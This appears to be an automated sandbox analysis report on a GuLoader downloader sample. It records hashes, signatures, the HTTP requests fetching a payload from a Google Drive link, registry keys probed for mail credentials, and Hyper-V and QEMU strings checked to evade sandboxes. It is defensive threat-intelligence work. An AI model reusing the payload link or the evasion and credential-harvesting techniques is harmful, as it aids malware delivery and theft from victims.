Edit tour

Windows Analysis Report
EL378_SPEC.exe

Overview

General Information

Sample Name:	EL378_SPEC.exe
Analysis ID:	1290922
MD5:	3bdbf0495a23287ddd05975e5e3b33f7
SHA1:	f2b6fc4711aebeabd45990ed03a58a79d26685d0
SHA256:	fbf85b3599b6741dc51a6a75bd9acc157d271595c9a8c36edee33c9d4482db8a
Infos:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to shutdown / reboot the system

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Found evaded block containing many API calls

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

EL378_SPEC.exe (PID: 7376 cmdline: C:\Users\user\Desktop\EL378_SPEC.exe MD5: 3BDBF0495A23287DDD05975E5E3B33F7)

EL378_SPEC.exe (PID: 7372 cmdline: C:\Users\user\Desktop\EL378_SPEC.exe MD5: 3BDBF0495A23287DDD05975E5E3B33F7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.14991153251.00000000066B3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: EL378_SPEC.exe	Virustotal: Detection: 40%			Perma Link
Source: EL378_SPEC.exe	ReversingLabs: Detection: 21%

Source: EL378_SPEC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.11.20:49934 version: TLS 1.2

Source: EL378_SPEC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: mshtml.pdbUGP source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00406719
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_004065CF FindFirstFileW,FindClose,	0_2_004065CF
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2dabnitj2jvlgqqqopjkuhsigr/1692010950000/14086511519431277494/*/1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7?e=download&uuid=96b46cb3-625e-4dba-8c88-a20b446aff4c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0s-as-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: EL378_SPEC.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: EL378_SPEC.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: EL378_SPEC.exe	String found in binary or memory: http://s.symcd.com06
Source: EL378_SPEC.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: EL378_SPEC.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: EL378_SPEC.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000626000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: EL378_SPEC.exe, 00000002.00000001.14866636889.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: EL378_SPEC.exe, 00000002.00000001.14866636889.00000000005F2000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: EL378_SPEC.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: EL378_SPEC.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: EL378_SPEC.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-as-docs.googleuse
Source: EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-as-docs.googleusercontent.com/
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-as-docs.googleusercontent.com/$
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004643000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2d
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0s-as-docs.googleusercontent.com/y
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/k
Source: EL378_SPEC.exe, 00000002.00000002.15080446509.0000000033E60000.00000004.00001000.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7L
Source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: EL378_SPEC.exe, 00000002.00000003.14998032909.0000000000060000.00000004.00001000.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14998032909.000000000006A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: EL378_SPEC.exe, 00000002.00000003.14998032909.000000000006A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: EL378_SPEC.exe, 00000002.00000003.14998032909.000000000006A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: EL378_SPEC.exe, 00000002.00000003.14998032909.000000000006A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000003.14987045762.0000000004662000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.000000000465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: EL378_SPEC.exe, 00000002.00000003.14981509641.0000000004663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ae4lec2dabnitj2jvlgqqqopjkuhsigr/1692010950000/14086511519431277494/*/1D_9oqJiGYaSSAotT1jhvlTKnlBW6kFZ7?e=download&uuid=96b46cb3-625e-4dba-8c88-a20b446aff4c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0s-as-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.11.20:49934 version: TLS 1.2

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Code function: 0_2_00404B30 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404B30

Source: EL378_SPEC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Code function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,

0_2_004036FC

Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_0040441E	0_2_0040441E
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_004075FE	0_2_004075FE
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_00406EAE	0_2_00406EAE
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_6ECC2351	0_2_6ECC2351

Source: C:\Users\user\Desktop\EL378_SPEC.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: EL378_SPEC.exe

Static PE information: invalid certificate

Source: EL378_SPEC.exe	Virustotal: Detection: 40%
Source: EL378_SPEC.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\EL378_SPEC.exe

File read: C:\Users\user\Desktop\EL378_SPEC.exe

Jump to behavior

Source: EL378_SPEC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\EL378_SPEC.exe C:\Users\user\Desktop\EL378_SPEC.exe
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process created: C:\Users\user\Desktop\EL378_SPEC.exe C:\Users\user\Desktop\EL378_SPEC.exe
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process created: C:\Users\user\Desktop\EL378_SPEC.exe C:\Users\user\Desktop\EL378_SPEC.exe	Jump to behavior

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\EL378_SPEC.exe

0_2_004036FC

Source: C:\Users\user\Desktop\EL378_SPEC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Jump to behavior

Source: C:\Users\user\Desktop\EL378_SPEC.exe

File created: C:\Users\user\AppData\Local\Temp\nsl11B7.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@3/6@2/2

Source: C:\Users\user\Desktop\EL378_SPEC.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Code function: 0_2_00404085 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,EnableWindow,

0_2_00404085

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: EL378_SPEC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: mshtml.pdbUGP source: EL378_SPEC.exe, 00000002.00000001.14866636889.0000000000649000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.14991153251.00000000066B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\EL378_SPEC.exe

File created: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: EL378_SPEC.exe, 00000000.00000002.14990484094.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15068823883.00000000048E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: GC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: EL378_SPEC.exe, 00000000.00000002.14989292213.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES
Source: EL378_SPEC.exe, 00000000.00000002.14989292213.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Evaded block: after key decision

graph_0-4582

Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00406719
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_004065CF FindFirstFileW,FindClose,	0_2_004065CF
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75

Source: C:\Users\user\Desktop\EL378_SPEC.exe

API call chain: ExitProcess graph end node

graph_0-4469

Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: EL378_SPEC.exe, 00000000.00000002.14989292213.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
Source: EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: EL378_SPEC.exe, 00000002.00000002.15067449874.0000000004651000.00000004.00000020.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15067449874.00000000045D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EL378_SPEC.exe, 00000000.00000002.14990484094.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15068823883.00000000048E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: GC:\Program Files\Qemu-ga\qemu-ga.exe
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: EL378_SPEC.exe, 00000000.00000002.14989292213.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: EL378_SPEC.exe, 00000000.00000002.15051793933.00000000075C9000.00000004.00000800.00020000.00000000.sdmp, EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: EL378_SPEC.exe, 00000002.00000002.15069289900.0000000006199000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Code function: 0_2_00403148 LdrInitializeThunk,GetTickCount,GetTickCount,LdrInitializeThunk,MulDiv,wsprintfW,LdrInitializeThunk,

0_2_00403148

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Process created: C:\Users\user\Desktop\EL378_SPEC.exe C:\Users\user\Desktop\EL378_SPEC.exe

Jump to behavior

Source: C:\Users\user\Desktop\EL378_SPEC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\EL378_SPEC.exe

0_2_004036FC

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\EL378_SPEC.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\EL378_SPEC.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

